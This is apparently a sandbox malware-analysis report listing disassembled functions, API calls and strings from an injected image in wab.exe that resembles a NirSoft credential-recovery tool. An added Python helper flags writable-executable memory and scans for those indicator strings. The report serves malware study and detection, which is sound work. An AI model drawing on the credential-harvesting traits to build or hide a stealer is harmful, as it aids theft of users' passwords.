                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                          • String ID: caption
                                          • API String ID: 973020956-4135340389
                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                          Strings
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf$wcscpy
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                          • API String ID: 1283228442-2366825230
                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                          APIs
                                          • wcschr.MSVCRT ref: 00413972
                                          • wcscpy.MSVCRT ref: 00413982
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          • wcscpy.MSVCRT ref: 004139D1
                                          • wcscat.MSVCRT ref: 004139DC
                                          • memset.MSVCRT ref: 004139B8
                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                          • memset.MSVCRT ref: 00413A00
                                          • memcpy.MSVCRT ref: 00413A1B
                                          • wcscat.MSVCRT ref: 00413A27
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                          • String ID: \systemroot
                                          • API String ID: 4173585201-1821301763
                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          • API String ID: 1284135714-318151290
                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                          • String ID: 0$6
                                          • API String ID: 4066108131-3849865405
                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                          APIs
                                          • memset.MSVCRT ref: 004082EF
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memset.MSVCRT ref: 00408362
                                          • memset.MSVCRT ref: 00408377
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 290601579-0
                                          • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                          • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memchrmemset
                                          • String ID: PD$PD
                                          • API String ID: 1581201632-2312785699
                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                          • GetDC.USER32(00000000), ref: 00409F6E
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                          • GetParent.USER32(?), ref: 00409FA5
                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                          • String ID:
                                          • API String ID: 2163313125-0
                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$wcslen
                                          • String ID:
                                          • API String ID: 239872665-3916222277
                                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpywcslen$_snwprintfmemset
                                          • String ID: %s (%s)$YV@
                                          • API String ID: 3979103747-598926743
                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                          APIs
                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                          • wcslen.MSVCRT ref: 0040A6B1
                                          • wcscpy.MSVCRT ref: 0040A6C1
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                          • wcscpy.MSVCRT ref: 0040A6DB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2767993716-572158859
                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                          APIs
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 0040DAFB
                                          • wcscpy.MSVCRT ref: 0040DB0B
                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          • API String ID: 3176057301-2039793938
                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                          Strings
                                          • too many attached databases - max %d, xrefs: 0042F64D
                                          • database is already attached, xrefs: 0042F721
                                          • out of memory, xrefs: 0042F865
                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                          • unable to open database: %s, xrefs: 0042F84E
                                          • database %s is already in use, xrefs: 0042F6C5
                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
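Every function above is attributed to the same memory dump, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp: a PE-backed region at 0x400000 inside the wab.exe process (PID 19, per the snapshot name hcaresult_19_2_400000_wab.jbxd) with page protection 0x40, which is PAGE_EXECUTE_READWRITE. The strings the report ties to that region (the nirsoft.net HTML report template, the TranslatorName/TranslatorURL/charset/rtl translation-ini keys, SQLite ATTACH error messages, the shell-folder names, the \systemroot prefix rewrite) are what a credential-recovery utility carries, not what an address-book program does. The helper below is an added example, not code from the report or from the analysed sample: it decodes the dump descriptor, flags a writable-and-executable region that starts with a PE header, and searches a region for the listed strings in both ASCII and UTF-16LE. Only the PID, base-address and protection fields are interpreted (the first two are confirmed by the snapshot name, the third by the winnt.h constants); the meaning of the remaining dotted fields is not stated on the page and they are returned raw. The indicator grouping and the sample region are constructed for the example.

```python
import re
import struct
from dataclasses import dataclass

# Page protection constants from winnt.h (documented Win32 values).
PAGE_PROTECT_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_PROTECT_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_EXECUTABLE = {0x40, 0x80}

# The dump descriptor the report cites for every function in this section.
REPORT_DUMP_NAME = "00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp"


@dataclass
class DumpDescriptor:
    pid: int
    base: int
    protect: int
    raw_fields: tuple  # all dotted fields as integers; fields other than 0, 3, 4 are not interpreted


def parse_sdmp_name(name: str) -> DumpDescriptor:
    """Split a Joe Sandbox *.sdmp name into hex fields.

    Field 0 = PID and field 3 = region base are confirmed by the report's own
    snapshot name (hcaresult_19_2_400000_wab.jbxd). Field 4 is read as a winnt.h
    protection value. Other fields: meaning not given on the page (assumption:
    sandbox-internal metadata), so they are only returned raw.
    """
    m = re.fullmatch(r"([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+)+)\.sdmp", name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    fields = tuple(int(f, 16) for f in m.group(1).split("."))
    if len(fields) < 5:
        raise ValueError(f"expected at least 5 fields, got {len(fields)}")
    return DumpDescriptor(pid=fields[0], base=fields[3], protect=fields[4], raw_fields=fields)


def describe_protection(protect: int) -> str:
    """Render a protection value as winnt.h names, e.g. 0x104 -> 'PAGE_READWRITE|PAGE_GUARD'."""
    names = [PAGE_PROTECT_BASE.get(protect & 0xFF, f"0x{protect & 0xFF:x}")]
    names += [n for bit, n in PAGE_PROTECT_MODIFIERS.items() if protect & bit]
    return "|".join(names)


def is_writable_executable(protect: int) -> bool:
    return (protect & 0xFF) in WRITABLE_EXECUTABLE


def has_pe_header(region: bytes) -> bool:
    """True if the region starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(region) < 0x40 or region[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
    return e_lfanew + 4 <= len(region) and region[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Strings the report attributes to functions in this dump, grouped by what they reveal
# (grouping is the example's own, not the report's).
INDICATORS = {
    "nirsoft_report_template": ["http://www.nirsoft.net/", '<table dir="rtl"><tr><td>'],
    "nirsoft_translation_ini": ["TranslatorName", "TranslatorURL"],
    "sqlite_attach": ["cannot ATTACH database within transaction", "database is already attached"],
    "shell_folders": ["Common Start Menu", "Favorites"],
    "nt_path_rewrite": ["\\systemroot"],
}


def scan_indicators(region: bytes) -> dict:
    """Locate each indicator as ASCII or UTF-16LE; returns {group: [(offset, encoding, text), ...]}."""
    hits = {}
    for group, needles in INDICATORS.items():
        for text in needles:
            for encoding in ("ascii", "utf-16-le"):
                needle = text.encode(encoding)
                pos = region.find(needle)
                while pos != -1:
                    hits.setdefault(group, []).append((pos, encoding, text))
                    pos = region.find(needle, pos + 1)
    return hits


def triage(name: str, region: bytes) -> dict:
    """Combine descriptor decoding, the RWX+PE check and the string scan into one verdict."""
    d = parse_sdmp_name(name)
    return {
        "pid": d.pid,
        "base": d.base,
        "protection": describe_protection(d.protect),
        "rwx_pe_image": is_writable_executable(d.protect) and has_pe_header(region),
        "indicator_groups": sorted(scan_indicators(region)),
    }


def build_sample_region() -> bytes:
    """Constructed input (not real dump content): minimal MZ/PE stub plus a few of the report's strings."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)          # e_lfanew -> 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    buf += "http://www.nirsoft.net/".encode("utf-16-le") + b"\x00\x00"   # wide, as _snwprintf/wcscpy imply
    buf += "TranslatorName".encode("utf-16-le") + b"\x00\x00"
    buf += b"cannot ATTACH database within transaction\x00"              # SQLite messages are narrow
    return bytes(buf)


if __name__ == "__main__":
    for key, value in triage(REPORT_DUMP_NAME, build_sample_region()).items():
        print(f"{key}: {value}")
```

Run against a real region, the useful signal is the combination: a writable-and-executable mapping at the historical image base of a process that is not supposed to be reading browser or mail databases, carrying a PE header and the strings above. Either half on its own (RWX memory, or these strings inside a legitimate password-recovery tool) is not by itself suspicious; the point of keeping the checks separate is so the output shows which of them fired.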
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                          • memcpy.MSVCRT ref: 0040EB80
                                          • memcpy.MSVCRT ref: 0040EB94
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          Strings
                                          Similarity
                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                          • String ID: ($d
                                          • API String ID: 1140211610-1915259565
                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                          APIs
                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                          • GetLastError.KERNEL32 ref: 004178FB
                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                          Similarity
                                          • API ID: File$ErrorLastLockSleepUnlock
                                          • String ID:
                                          • API String ID: 3015003838-0
                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                          APIs
                                          • memset.MSVCRT ref: 00407E44
                                          • memset.MSVCRT ref: 00407E5B
                                          • _mbscpy.MSVCRT ref: 00407E7E
                                          • _mbscpy.MSVCRT ref: 00407ED7
                                          • _mbscpy.MSVCRT ref: 00407EEE
                                          • _mbscpy.MSVCRT ref: 00407F01
                                          • wcscpy.MSVCRT ref: 00407F10
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                          Similarity
                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                          • String ID:
                                          • API String ID: 59245283-0
                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                          • GetLastError.KERNEL32 ref: 0041855C
                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                          • GetLastError.KERNEL32 ref: 0041858E
                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                          Similarity
                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                          • String ID:
                                          • API String ID: 3467550082-0
                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                          • memset.MSVCRT ref: 00413ADC
                                          • memset.MSVCRT ref: 00413AEC
                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                          • memset.MSVCRT ref: 00413BD7
                                          • wcscpy.MSVCRT ref: 00413BF8
                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                          Strings
                                          Similarity
                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                          • String ID: 3A
                                          • API String ID: 3300951397-293699754
                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                          • wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                          • wcslen.MSVCRT ref: 0040D1D3
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                          • memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                          Strings
                                          Similarity
                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                          • String ID: strings
                                          • API String ID: 3166385802-3030018805
                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                          APIs
                                          • memset.MSVCRT ref: 00411AF6
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
